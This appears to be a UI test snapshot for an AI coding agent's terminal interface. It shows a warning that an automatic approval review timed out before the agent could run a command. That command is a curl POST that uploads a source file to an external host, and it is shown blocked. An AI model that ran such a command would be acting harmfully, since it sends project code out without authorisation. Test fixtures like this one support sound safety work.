tui/src/chatwidget/snapshots/rexux_tui__chatwidget__tests__guardian_timed_out_exec_renders_warning_and_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---









⚠ Automatic approval review timed out while evaluating the requested approval.

✗ Review timed out before rexux could run curl -sS -i -X POST --data-binary
  @core/src/rexux.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Rexux to do anything

  gpt-5.6-sol default · /tmp/project
